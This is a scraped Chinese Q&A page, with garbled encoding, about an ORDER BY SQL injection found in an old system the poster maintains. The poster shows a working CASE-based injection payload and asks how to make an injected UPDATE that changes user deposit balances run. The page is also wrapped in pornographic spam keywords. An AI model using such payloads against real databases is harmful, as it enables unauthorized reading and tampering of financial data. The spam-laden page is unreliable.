av一区二区在线观看_亚洲男人的天堂网站_日韩亚洲视频_在线成人免费_欧美日韩精品免费观看视频_久草视

您的位置:首頁技術(shù)文章
文章詳情頁

mysql - sql報錯原因?

瀏覽:84日期:2022-06-13 10:08:51

問題描述

發(fā)現(xiàn)一個正在維護的老系統(tǒng)的基于orderBy的sql注入漏洞,準備驗證一下,

我先執(zhí)行這個sql注入,是可以的

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(select depositfrom sysuser_user_deposit)end)=1 ASC LIMIT 20 OFFSET 0

但是當我執(zhí)行這個帶update語句的sql時報錯了:

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(updatesysuser_user_depositsetdeposit=11)end)=1 ASC LIMIT 20 OFFSET 0

報錯

<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’update<br>sysuser_user_deposit<br>set<br>deposit=11)end)=1 ASC LIMIT 20 OFFSET 0’ at line 9</code>

我應該如何讓他執(zhí)行update?

問題解答

回答1:

主體是select的時候,里面是不能update的,否則執(zhí)行不了的,mybatis這種注入我試過,<select>里執(zhí)行update直接報錯,注入不了

相關文章:
主站蜘蛛池模板: 91免费观看 | 国内精品视频免费观看 | 在线日韩视频 | 国产精品99久久久久久人 | 亚洲精品大片 | 久久精品二区亚洲w码 | 欧美亚洲高清 | 中文字幕综合在线 | 狠狠干五月天 | 国产精品jizz在线观看老狼 | 欧洲av一区 | 亚洲国产一区在线 | 97伊人| 国产ts人妖另类 | 国产成人在线视频播放 | 国产剧情一区 | aaaaaaa片毛片免费观看 | 日日干夜夜操 | 韩日视频在线观看 | 午夜视频在线视频 | 精品国模一区二区三区欧美 | 九九伊人sl水蜜桃色推荐 | 亚洲国产一区二区三区在线观看 | 午夜极品 | 久久a久久| 免费观看黄色一级片 | 免费看黄色国产 | 亚洲一区二区精品视频在线观看 | 中文一区| 日皮视频免费 | 久久精品一区二区视频 | 欧美一区二区三区视频 | 91精品麻豆日日躁夜夜躁 | 午夜码电影| 久久激情视频 | 成年人在线观看视频 | 久久国产欧美日韩精品 | 天天草视频 | 自拍偷拍中文字幕 | 亚洲高清在线观看 | 99爱在线免费观看 |